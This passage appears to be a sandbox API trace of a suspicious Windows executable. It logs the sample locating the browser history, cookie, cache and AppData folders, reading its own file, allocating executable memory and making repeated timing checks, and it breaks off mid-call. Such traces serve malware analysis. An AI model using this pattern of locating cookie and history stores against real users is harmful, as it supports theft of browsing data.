SysReAllocStringLen (in: pbstr=0x41f658*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x41f658*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0049.939] GetThreadLocale () returned 0x409 [0049.939] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.939] GetThreadLocale () returned 0x409 [0049.939] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.939] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpFilePart=0x41f390*=0x0) returned 0x27 [0049.939] SysReAllocStringLen (in: pbstr=0x41f658*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x41f658*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0049.939] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0049.939] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchLength=0x27 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 0x27 [0049.939] SysReAllocStringLen (in: pbstr=0x41f658*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\", len=0x27 | out: pbstr=0x41f658*="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 1 [0049.940] SysReAllocStringLen (in: pbstr=0xae27d4*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\", len=0x27 | out: pbstr=0xae27d4*="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 1 [0049.940] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0049.966] SysReAllocStringLen (in: pbstr=0x41f648*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History", len=0x45 | out: pbstr=0x41f648*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0049.967] SysReAllocStringLen (in: pbstr=0x41f64c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x41f64c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0049.967] GetThreadLocale () returned 0x409 [0049.967] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.967] GetThreadLocale () returned 0x409 [0049.967] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x41f390*=0x0) returned 0x46 [0049.967] SysReAllocStringLen (in: pbstr=0x41f64c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x41f64c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0049.967] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0049.967] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x46 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 0x46 [0049.967] SysReAllocStringLen (in: pbstr=0x41f64c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\", len=0x46 | out: pbstr=0x41f64c*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0049.967] SysReAllocStringLen (in: pbstr=0xae27d8*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\", len=0x46 | out: pbstr=0xae27d8*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0049.967] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0050.102] SysReAllocStringLen (in: pbstr=0x41f63c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x47 | out: pbstr=0x41f63c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0050.102] SysReAllocStringLen (in: pbstr=0x41f640*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x41f640*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0050.102] GetThreadLocale () returned 0x409 [0050.102] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0050.102] GetThreadLocale () returned 0x409 [0050.102] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0050.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x41f390*=0x0) returned 0x48 [0050.102] SysReAllocStringLen (in: pbstr=0x41f640*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x41f640*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0050.102] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0050.102] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x48 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x48 [0050.103] SysReAllocStringLen (in: pbstr=0x41f640*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x48 | out: pbstr=0x41f640*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0050.103] SysReAllocStringLen (in: pbstr=0xae27dc*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x48 | out: pbstr=0xae27dc*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0050.103] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0050.108] SysReAllocStringLen (in: pbstr=0x41f630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x56 | out: pbstr=0x41f630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0050.108] SysReAllocStringLen (in: pbstr=0x41f634*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x41f634*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0050.108] GetThreadLocale () returned 0x409 [0050.108] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0050.108] GetThreadLocale () returned 0x409 [0050.108] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0050.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x41f390*=0x0) returned 0x57 [0050.108] SysReAllocStringLen (in: pbstr=0x41f634*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x41f634*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0050.108] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0050.109] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x57 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x57 [0050.109] SysReAllocStringLen (in: pbstr=0x41f634*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x57 | out: pbstr=0x41f634*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0050.109] SysReAllocStringLen (in: pbstr=0xae27e0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x57 | out: pbstr=0xae27e0*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0050.109] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0xaf1db4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0050.111] SysReAllocStringLen (in: pbstr=0x41f624*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x41f624*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0050.111] SysReAllocStringLen (in: pbstr=0x41f628*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x41f628*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0050.111] GetThreadLocale () returned 0x409 [0050.111] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0050.111] GetThreadLocale () returned 0x409 [0050.111] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0050.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpFilePart=0x41f390*=0x0) returned 0x2e [0050.112] SysReAllocStringLen (in: pbstr=0x41f628*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x41f628*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0050.112] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0050.112] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchLength=0x2e | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 0x2e [0050.112] SysReAllocStringLen (in: pbstr=0x41f628*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\", len=0x2e | out: pbstr=0x41f628*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 1 [0050.112] SysReAllocStringLen (in: pbstr=0xae27e4*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\", len=0x2e | out: pbstr=0xae27e4*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 1 [0050.112] VirtualFree (lpAddress=0xaf4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0050.124] GetVersion () returned 0x1db10106 [0050.124] GetCurrentProcessId () returned 0xba0 [0050.124] GetCurrentProcess () returned 0xffffffff [0050.124] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0050.124] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0050.124] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0050.124] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe\" " [0050.124] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0050.214] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", NtPathName=0x41f5d8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0050.214] NtCreateFile (in: FileHandle=0x41f5e8, DesiredAccess=0x80100080, ObjectAttributes=0x41f5bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x41f5e0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x41f5e8*=0xe4, IoStatusBlock=0x41f5e0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0050.346] RtlFreeAnsiString (AnsiString="\\") [0050.370] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x41f5e4, FileInformation=0x41f5dc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0050.551] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f7f0, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f7f0*) returned 0x0 [0050.710] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x41f5e4, FileInformation=0x41f5dc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0050.710] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f7dc, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f7dc*) returned 0x0 [0050.710] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x41f5e4, FileInformation=0x41f5dc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0050.710] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6fc, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6fc*) returned 0x0 [0050.710] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x41f5e4, FileInformation=0x41f5dc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0050.710] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6d4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6d4*) returned 0x0 [0050.710] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6d4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6d4*) returned 0x0 [0050.718] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6d4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6d4*) returned 0x0 [0050.718] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6d4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6d4*) returned 0x0 [0050.719] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x41f5e0, Buffer=0x41f6d4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x41f5e0, Buffer=0x41f6d4*) returned 0x0 [0050.746] NtClose (Handle=0xe4) returned 0x0 [0050.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0050.871] GetVersionExA (in: lpVersionInformation=0x41f55c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x41f584, dwMinorVersion=0x76e4443a, dwBuildNumber=0x767666bc, dwPlatformId=0x6e0ed0, szCSDVersion="@jm") | out: lpVersionInformation=0x41f55c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.095] GetCurrentThreadId () returned 0xba4 [0051.095] VirtualAlloc (lpAddress=0xaf4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0xaf4000 [0051.198] GetTickCount () returned 0x1146b32 [0051.198] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17125205451) returned 1 [0051.198] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17125213160) returned 1 [0051.198] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17125219120) returned 1 [0051.198] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17125225090) returned 1 [0051.198] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17125231670) returned 1 [0051.199] Sleep (dwMilliseconds=0x0) [0051.290] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134437005) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134444876) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134451854) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134459386) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134466423) returned 1 [0051.291] Sleep (dwMilliseconds=0x0) [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134493099) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134499299) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134506917) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134512912) returned 1 [0051.291] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17134519786) returned 1 [0051.291] Sleep (dwMilliseconds=0x0) [0051.305] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17135918893) returned 1 [0051.305] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17135926191) returned 1 [0051.305] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17135932022) returned 1 [0051.306] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17135937891) returned 1 [0051.306] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7a8 | out: lpPerformanceCount=0x41f7a8*=17135943884) returned 1 [0051.306] Sleep (dwMilliseconds=0x0) [0051.318] GetTickCount () returned 0x1146b9f [0051.318] VirtualFree (lpAddress=0xb14000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0051.426] VirtualAlloc (lpAddress=0xb14000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xb14000 [0051.584] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41ee04, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0051.585] RtlUnwind (TargetFrame=0x41f7dc, TargetIp=0x13d1944, ExceptionRecord=0x41f328, ReturnValue=0x0) [0051.585] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41ee04, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0051.585] RtlUnwind (TargetFrame=0x41f7dc, TargetIp=0x13d1944, ExceptionRecord=0x41f328, ReturnValue=0x0) [0051.585] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41ee04, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0051.586] RtlUnwind (TargetFrame=0x41f7dc, TargetIp=0x13d1944, ExceptionRecord=0x41f328, ReturnValue=0x0) [0051.609] VirtualAlloc (lpAddress=0xb24000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0051.699] VirtualFree (lpAddress=0xb24000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.809] GetCurrentThreadId () returned 0xba4 [0051.810] GetCurrentThreadId () returned 0xba4 [0051.810] GetCurrentThreadId () returned 0xba4 [0051.840] GetCurrentThreadId () returned 0xba4 [0051.840] GetCurrentThreadId () returned 0xba4 [0051.840] GetCurrentThreadId () returned 0xba4 [0051.840] GetCurrentThreadId () returned 0xba4 [0051.840] GetCurrentThreadId () returned 0xba4 [0051.840] VirtualFree (lpAddress=0xb14000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0052.065] GetLocalTime (in: lpSystemTime=0x41f7a4 | out: lpSystemTime=0x41f7a4*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1e, wMilliseconds=0x34a)) [0052.065] GetTimeZoneInformation (in: lpTimeZoneInformation=0x41f6f4 | out: lpTimeZoneInformation=0x41f6f4) returned 0x2 [0052.467] GetLocalTime (in: lpSystemTime=0x41f7a4 | out: lpSystemTime=0x41f7a4*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x5b)) [0052.519] GetTimeZoneInformation (in: lpTimeZoneInformation=0x41f6f4 | out: lpTimeZoneInformation=0x41f6f4) returned 0x2 [0052.680] GetTickCount () returned 0x1146f66 [0052.707] GetTickCount () returned 0x1146f76 [0052.969] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0052.995] LoadStringA (in: 